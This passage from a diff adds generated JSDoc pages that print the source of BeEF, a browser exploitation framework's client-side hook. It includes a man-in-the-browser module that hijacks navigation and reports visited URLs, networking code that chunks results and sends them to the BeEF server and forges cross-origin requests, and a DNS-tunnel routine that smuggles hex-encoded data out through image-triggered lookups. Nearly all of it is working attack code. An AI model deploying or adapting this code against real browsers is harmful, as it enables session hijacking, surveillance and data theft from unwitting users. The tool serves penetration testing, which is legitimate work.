title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be:"EF" }, title, url);
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
};
y.send(null);
beef.mitb.sniff("GET: " + url);
} catch (x) {
// the link is cross-origin, so load the resource in a different tab
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
}
},
/** Relays an entry to the framework */
sniff:function (result) {
try {
beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
} catch (x) {
}
return true;
},
/** Signals the Framework that the user has lost the hook */
endSession:function () {
beef.mitb.sniff("Window closed.");
}
};
beef.regCmp('beef.mitb');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

615
docs/net.js.html Normal file
View File

@@ -0,0 +1,615 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides basic networking functions,
* like beef.net.request and beef.net.forgeRequest,
* used by BeEF command modules and the Requester extension,
* as well as beef.net.send which is used to return commands
* to BeEF server-side components.
*
* Also, it contains the core methods used by the XHR-polling
* mechanism (flush, queue)
* @namespace beef.net
*
*/
beef.net = {
host: "&lt;%= @beef_host %>",
port: "&lt;%= @beef_port %>",
hook: "&lt;%= @beef_hook %>",
httpproto: "&lt;%= @beef_proto %>",
handler: '/dh',
chop: 500,
pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
sid_count: 0,
cmd_queue: [],
/**
* Command object. This represents the data to be sent back to BeEF,
* using the beef.net.send() method.
*/
command: function () {
this.cid = null;
this.results = null;
this.status = null;
this.handler = null;
this.callback = null;
},
/**
* Packet object. A single chunk of data. X packets -> 1 stream
*/
packet: function () {
this.id = null;
this.data = null;
},
/**
* Stream object. Contains X packets, which are command result chunks.
*/
stream: function () {
this.id = null;
this.packets = [];
this.pc = 0;
this.get_base_url_length = function () {
return (this.url + this.handler + '?' + 'bh=' + beef.session.get_hook_session_id()).length;
};
this.get_packet_data = function () {
var p = this.packets.shift();
return {'bh': beef.session.get_hook_session_id(), 'sid': this.id, 'pid': p.id, 'pc': this.pc, 'd': p.data }
};
},
/**
* Response Object - used in the beef.net.request callback
* NOTE: as we are using async mode, the response object will be empty if returned.
* Using sync mode, request obj fields will be populated.
*/
response: function () {
this.status_code = null; // 500, 404, 200, 302
this.status_text = null; // success, timeout, error, ...
this.response_body = null; // "&lt;html>…." if not a cross-origin request
this.port_status = null; // tcp port is open, closed or not http
this.was_cross_domain = null; // true or false
this.was_timedout = null; // the user specified timeout was reached
this.duration = null; // how long it took for the request to complete
this.headers = null; // full response headers
},
/**
* Queues the specified command results.
* @param {String} handler the server-side handler that will be called
* @param {Integer} cid command id
* @param {String} results the data to send
* @param {Integer} status the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
* @param {Function} callback the function to call after execution
*/
queue: function (handler, cid, results, status, callback) {
if (typeof(handler) === 'string' &amp;&amp; typeof(cid) === 'number' &amp;&amp; (callback === undefined || typeof(callback) === 'function')) {
var s = new beef.net.command();
s.cid = cid;
s.results = beef.net.clean(results);
s.status = status;
s.callback = callback;
s.handler = handler;
this.cmd_queue.push(s);
}
},
/**
* Queues the current command results and flushes the queue straight away.
* NOTE: Always send Browser Fingerprinting results
* (beef.net.browser_details(); -> /init handler) using normal XHR-polling,
* even if WebSockets are enabled.
* @param {String} handler the server-side handler that will be called
* @param {Integer} cid command id
* @param {String} results the data to send
* @param {Integer} exec_status the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
* @param {Function} callback the function to call after execution
* @return {Integer} the command module execution status (defaults to 0 - 'unknown' if status is null)
*/
send: function (handler, cid, results, exec_status, callback) {
// defaults to 'unknown' execution status if no parameter is provided, otherwise set the status
var status = 0;
if (exec_status != null &amp;&amp; parseInt(Number(exec_status)) == exec_status){ status = exec_status}
if (typeof beef.websocket === "undefined" || (handler === "/init" &amp;&amp; cid == 0)) {
this.queue(handler, cid, results, status, callback);
this.flush();
} else {
try {
beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
'", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
'", "status": "' + exec_status +
'", "callback": "' + callback +
'","bh":"' + beef.session.get_hook_session_id() + '" }');
} catch (e) {
this.queue(handler, cid, results, status, callback);
this.flush();
}
}
return status;
},
/**
* Flush all currently queued command results to the framework,
* chopping the data in chunks ('chunk' method) which will be re-assembled
* server-side by the network stack.
* NOTE: currently 'flush' is used only with the default
* XHR-polling mechanism. If WebSockets are used, the data is sent
* back to BeEF straight away.
*/
flush: function (callback) {
if (this.cmd_queue.length > 0) {
var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
this.cmd_queue.length = 0;
this.sid_count++;
var stream = new this.stream();
stream.id = this.sid_count;
var pad = stream.get_base_url_length() + this.pad;
//cant continue if chop amount is too low
if ((this.chop - pad) > 0) {
var data = this.chunk(data, (this.chop - pad));
for (var i = 1; i &lt;= data.length; i++) {
var packet = new this.packet();
packet.id = i;
packet.data = data[(i - 1)];
stream.packets.push(packet);
}
stream.pc = stream.packets.length;
this.push(stream, callback);
}
} else {
if ((typeof callback != 'undefined') &amp;&amp; (callback != null)) {
callback();
}
}
},
/**
* Split the input data into chunk lengths determined by the amount parameter.
* @param {String} str the input data
* @param {Integer} amount chunk length
*/
chunk: function (str, amount) {
if (typeof amount == 'undefined') n = 2;
return str.match(RegExp('.{1,' + amount + '}', 'g'));
},
/**
* Push the input stream back to the BeEF server-side components.
* It uses beef.net.request to send back the data.
* @param {Object} stream the stream object to be sent back.
*/
push: function (stream, callback) {
//need to implement wait feature here eventually
if (typeof callback === 'undefined') {
callback = null;
}
for (var i = 0; i &lt; stream.pc; i++) {
var cb = null;
if (i == (stream.pc - 1)) {
cb = callback;
}
this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null,
stream.get_packet_data(), 10, 'text', cb);
}
},
/**
* Performs http requests
* @param {String} scheme HTTP or HTTPS
* @param {String} method GET or POST
* @param {String} domain bindshell.net, 192.168.3.4, etc
* @param {Int} port 80, 5900, etc
* @param {String} path /path/to/resource
* @param {String} anchor this is the value that comes after the # in the URL
* @param {String} data This will be used as the query string for a GET or post data for a POST
* @param {Int} timeout timeout the request after N seconds
* @param {String} dataType specify the data return type expected (ie text/html/script)
* @param {Function} callback call the callback function at the completion of the method
*
* @return {Object} this object contains the response details
*/
request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
//check if same domain or cross domain
var cross_domain = true;
if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
if (document.location.port == "" || document.location.port == null) {
cross_domain = !(port == "80" || port == "443");
}
}
//build the url
var url = "";
if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
url = path;
} else {
url = scheme + "://" + domain;
url = (port != null) ? url + ":" + port : url;
url = (path != null) ? url + path : url;
url = (anchor != null) ? url + "#" + anchor : url;
}
//define response object
var response = new this.response;
response.was_cross_domain = cross_domain;
var start_time = new Date().getTime();
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST") {
$j.ajaxSetup({
dataType: dataType
});
} else {
$j.ajaxSetup({
dataType: 'script'
});
}
//build and execute the request
$j.ajax({type: method,
url: url,
data: data,
timeout: (timeout * 1000),
//This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
beforeSend: function (xhr) {
if (method == "POST") {
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
}
},
success: function (data, textStatus, xhr) {
var end_time = new Date().getTime();
response.status_code = xhr.status;
response.status_text = textStatus;
response.response_body = data;
response.port_status = "open";
response.was_timedout = false;
response.duration = (end_time - start_time);
},
error: function (jqXHR, textStatus, errorThrown) {
var end_time = new Date().getTime();
response.response_body = jqXHR.responseText;
response.status_code = jqXHR.status;
response.status_text = textStatus;
response.duration = (end_time - start_time);
response.port_status = "open";
},
complete: function (jqXHR, textStatus) {
response.status_code = jqXHR.status;
response.status_text = textStatus;
response.headers = jqXHR.getAllResponseHeaders();
// determine if TCP port is open/closed/not-http
if (textStatus == "timeout") {
response.was_timedout = true;
response.response_body = "ERROR: Timed out\n";
response.port_status = "closed";
} else if (textStatus == "parsererror") {
response.port_status = "not-http";
} else {
response.port_status = "open";
}
}
}).always(function () {
if (callback != null) {
callback(response);
}
});
return response;
},
/**
* Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
* - requestid: needed on the callback
* - allowCrossDomain: set cross-domain requests as allowed or blocked
*
* forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
* Example usage:
* beef.net.forge_request("http", "POST", "172.20.40.50", 8080, "/lulz",
* true, null, { foo: "bar" }, 5, 'html', false, null, function(response) {
* alert(response.response_body)})
*/
forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
if (domain == "undefined" || path == "undefined") {
beef.debug("[beef.net.forge_request] Error: Malformed request. No host specified.");
return;
}
// check if same domain or cross domain
var cross_domain = true;
if (document.domain == domain &amp;&amp; document.location.protocol == scheme + ':') {
if (document.location.port == "" || document.location.port == null) {
cross_domain = !(port == "80" || port == "443");
} else {
if (document.location.port == port) cross_domain = false;
}
}
// build the url
var url = "";
if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
url = path;
} else {
url = scheme + "://" + domain;
url = (port != null) ? url + ":" + port : url;
url = (path != null) ? url + path : url;
url = (anchor != null) ? url + "#" + anchor : url;
}
// define response object
var response = new this.response;
response.was_cross_domain = cross_domain;
var start_time = new Date().getTime();
// if cross-domain requests are not allowed and the request is cross-domain
// don't proceed and return
if (allowCrossDomain == "false" &amp;&amp; cross_domain) {
beef.debug("[beef.net.forge_request] Error: Cross Domain Request. The request was not sent.");
response.status_code = -1;
response.status_text = "crossdomain";
response.port_status = "crossdomain";
response.response_body = "ERROR: Cross Domain Request. The request was not sent.\n";
response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
if (callback != null) callback(response, requestid);
return response;
}
// if the request was cross-domain from a HTTPS origin to HTTP
// don't proceed and return
if (document.location.protocol == 'https:' &amp;&amp; scheme == 'http') {
beef.debug("[beef.net.forge_request] Error: Mixed Active Content. The request was not sent.");
response.status_code = -1;
response.status_text = "mixedcontent";
response.port_status = "mixedcontent";
response.response_body = "ERROR: Mixed Active Content. The request was not sent.\n";
response.headers = "ERROR: Mixed Active Content. The request was not sent.\n";
if (callback != null) callback(response, requestid);
return response;
}
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST") {
$j.ajaxSetup({
dataType: dataType
});
} else {
$j.ajaxSetup({
dataType: 'script'
});
}
// this is required for bugs in IE so data can be transferred back to the server
if (beef.browser.isIE()) {
dataType = 'script'
}
$j.ajax({type: method,
dataType: dataType,
url: url,
headers: headers,
timeout: (timeout * 1000),
//This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
beforeSend: function (xhr) {
if (method == "POST") {
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
}
},
data: data,
// http server responded successfully
success: function (data, textStatus, xhr) {
var end_time = new Date().getTime();
response.status_code = xhr.status;
response.status_text = textStatus;
response.response_body = data;
response.was_timedout = false;
response.duration = (end_time - start_time);
},
// server responded with a http error (403, 404, 500, etc)
// or server is not a http server
error: function (xhr, textStatus, errorThrown) {
var end_time = new Date().getTime();
response.response_body = xhr.responseText;
response.status_code = xhr.status;
response.status_text = textStatus;
response.duration = (end_time - start_time);
},
complete: function (xhr, textStatus) {
// cross-domain request
if (cross_domain) {
response.port_status = "crossdomain";
if (xhr.status != 0) {
response.status_code = xhr.status;
} else {
response.status_code = -1;
}
if (textStatus) {
response.status_text = textStatus;
} else {
response.status_text = "crossdomain";
}
if (xhr.getAllResponseHeaders()) {
response.headers = xhr.getAllResponseHeaders();
} else {
response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
}
if (!response.response_body) {
response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
}
} else {
// same-domain request
response.status_code = xhr.status;
response.status_text = textStatus;
response.headers = xhr.getAllResponseHeaders();
// determine if TCP port is open/closed/not-http
if (textStatus == "timeout") {
response.was_timedout = true;
response.response_body = "ERROR: Timed out\n";
response.port_status = "closed";
/*
* With IE we need to explicitly set the dataType to "script",
* so there will be always parse-errors if the content is != javascript
* */
} else if (textStatus == "parsererror") {
response.port_status = "not-http";
if (beef.browser.isIE()) {
response.status_text = "success";
response.port_status = "open";
}
} else {
response.port_status = "open";
}
}
callback(response, requestid);
}
});
return response;
},
/** this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
* http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/
*/
clean: function (r) {
if (this.array_has_string_key(r)) {
var obj = {};
for (var key in r)
obj[key] = (this.array_has_string_key(obj[key])) ? this.clean(r[key]) : r[key];
return obj;
}
return r;
},
/** Detects if an array has a string key */
array_has_string_key: function (arr) {
if ($j.isArray(arr)) {
try {
for (var key in arr)
if (isNaN(parseInt(key))) return true;
} catch (e) {
}
}
return false;
},
/**
* Checks if the specified port is valid
*/
is_valid_port: function (port) {
if (isNaN(port)) return false;
if (port > 65535 || port &lt; 0) return false;
return true;
},
/**
* Checks if the specified IP address is valid
*/
is_valid_ip: function (ip) {
if (ip == null) return false;
var ip_match = ip.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (ip_match == null) return false;
return true;
},
/**
* Checks if the specified IP address range is valid
*/
is_valid_ip_range: function (ip_range) {
if (ip_range == null) return false;
var range_match = ip_range.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range_match == null || range_match[1] == null) return false;
return true;
},
/**
* Sends back browser details to framework, calling beef.browser.getDetails()
*/
browser_details: function () {
var details = beef.browser.getDetails();
var res = null;
details['HookSessionID'] = beef.session.get_hook_session_id();
this.send('/init', 0, details);
if(details != null)
res = true;
return res;
}
};
beef.regCmp('beef.net');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

101
docs/net_connection.js.html Normal file
View File

@@ -0,0 +1,101 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net/connection.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net/connection.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* beef.net.connection - wraps Mozilla's Network Information API
* https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation
* https://developer.mozilla.org/en-US/docs/Web/API/Navigator/connection
* @namespace beef.net.connection
*/
beef.net.connection = {
/**
* Returns the connection type. https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/type
* @example beef.net.connection.type()
* @return {String} connection type or 'unknown'.
*/
type: function () {
try {
var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
var type = connection.type;
if (/^[a-z]+$/.test(type)) return type; else return 'unknown';
} catch(e) {
beef.debug("Error retrieving connection type: " + e.message);
return 'unknown';
}
},
/**
* Returns the maximum downlink speed of the connection. https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/downlinkMax
* @example beef.net.connection.downlinkMax()
* @return {String} downlink max or 'unknown'.
*/
downlinkMax: function () {
try {
var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
var max = connection.downlinkMax;
if (max) return max; else return 'unknown';
} catch(e) {
beef.debug("Error retrieving connection downlink max: " + e.message);
return 'unknown';
}
}
};
beef.regCmp('beef.net.connection');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

134
docs/net_cors.js.html Normal file
View File

@@ -0,0 +1,134 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net/cors.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net/cors.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>/**
* @namespace beef.net.cors
*/
beef.net.cors = {
handler: "cors",
/**
* Response Object - used in the beef.net.request callback
*/
response:function () {
this.status = null; // 500, 404, 200, 302, etc
this.headers = null; // full response headers
this.body = null; // full response body
},
/**
* Make a cross-origin request using CORS
*
* @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
* @param url {String} url
* @param data {String} request body
* @param timeout {Integer} request timeout in milliseconds
* @param callback {Function} function to callback on completion
*/
request: function(method, url, data, timeout, callback) {
var xhr;
var response = new this.response;
if (XMLHttpRequest) {
xhr = new XMLHttpRequest();
if ('withCredentials' in xhr) {
xhr.open(method, url, true);
xhr.timeout = parseInt(timeout, 10);
xhr.onerror = function() {
};
xhr.onreadystatechange = function() {
if (xhr.readyState === 4) {
response.headers = this.getAllResponseHeaders()
response.body = this.responseText;
response.status = this.status;
if (!!callback) {
if (!!response) {
callback(response);
} else {
callback('ERROR: No Response. CORS requests may be denied for this resource.')
}
}
}
};
xhr.send(data);
}
} else if (typeof XDomainRequest != "undefined") {
xhr = new XDomainRequest();
xhr.open(method, url);
xhr.onerror = function() {
};
xhr.onload = function() {
response.headers = this.getAllResponseHeaders()
response.body = this.responseText;
response.status = this.status;
if (!!callback) {
if (!!response) {
callback(response);
} else {
callback('ERROR: No Response. CORS requests may be denied for this resource.')
}
}
};
xhr.send(data);
} else {
if (!!callback) callback('ERROR: Not Supported. CORS is not supported by the browser. The request was not sent.');
}
}
};
beef.regCmp('beef.net.cors');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

148
docs/net_dns.js.html Normal file
View File

@@ -0,0 +1,148 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net/dns.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net/dns.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
*
* request object structure:
* + msgId: {Integer} Unique message ID for the request.
* + domain: {String} Remote domain to retrieve the data.
* + wait: {Integer} Wait time between requests (milliseconds) - NOT IMPLEMENTED
* + callback: {Function} Callback function to receive the number of requests sent.
* @namespace beef.net.dns
*/
beef.net.dns = {
handler: "dns",
/**
*
* @param msgId
* @param data
* @param domain
* @param callback
*/
send: function(msgId, data, domain, callback) {
var encode_data = function(str) {
var result="";
for(i=0;i&lt;str.length;++i) {
result+=str.charCodeAt(i).toString(16).toUpperCase();
}
return result;
};
var encodedData = encodeURI(encode_data(data));
beef.debug(encodedData);
beef.debug("_encodedData_ length: " + encodedData.length);
// limitations to DNS according to RFC 1035:
// o Domain names must only consist of a-z, A-Z, 0-9, hyphen (-) and fullstop (.) characters
// o Domain names are limited to 255 characters in length (including dots)
// o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains)
// o Subdomains are limited to 63 characters in length (including the trailing dot)
// DNS request structure:
// COMMAND_ID.SEQ_NUM.SEQ_TOT.DATA.DOMAIN
//max_length: 3. 3 . 3 . 63 . x
// only max_data_segment_length is currently used to split data into chunks. and only 1 chunk is used per request.
// for optimal performance, use the following vars and use the whole available space (which needs changes server-side too)
var reserved_seq_length = 3 + 3 + 3 + 3; // consider also 3 dots
var max_domain_length = 255 - reserved_seq_length; //leave some space for sequence numbers
var max_data_segment_length = 63; // by RFC
beef.debug("max_data_segment_length: " + max_data_segment_length);
var dom = document.createElement('b');
String.prototype.chunk = function(n) {
if (typeof n=='undefined') n=100;
return this.match(RegExp('.{1,'+n+'}','g'));
};
var sendQuery = function(query) {
var img = new Image;
//img.src = "http://"+query;
img.src = beef.net.httpproto + "://" + query; // prevents issues with mixed content
img.onload = function() { dom.removeChild(this); }
img.onerror = function() { dom.removeChild(this); }
dom.appendChild(img);
//experimental
//setTimeout(function(){dom.removeChild(img)},1000);
};
var segments = encodedData.chunk(max_data_segment_length);
var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request
beef.debug(segments.length);
for (var seq=1; seq&lt;=segments.length; seq++) {
sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
}
// callback - returns the number of queries sent
if (!!callback) callback(segments.length);
}
};
beef.regCmp('beef.net.dns');
</code></pre>
</article>
</section>
</div>
<nav>
